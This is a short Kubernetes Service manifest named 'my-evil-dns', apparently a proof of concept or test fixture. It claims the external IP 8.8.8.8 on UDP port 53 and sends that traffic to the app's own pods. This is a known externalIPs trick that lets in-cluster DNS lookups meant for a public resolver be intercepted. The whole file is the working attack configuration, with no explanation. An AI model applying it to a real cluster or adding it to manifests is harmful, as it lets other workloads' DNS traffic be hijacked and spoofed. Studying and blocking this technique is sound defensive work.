apiVersion: v1
kind: Service
metadata:
  name: my-evil-dns
spec:
  externalTrafficPolicy: Cluster
  externalIPs:
    - 8.8.8.8
  ports:
  - name: udp
    port: 53
    targetPort: 53
    protocol: UDP
  selector:
    app: my-app
  type: LoadBalancer
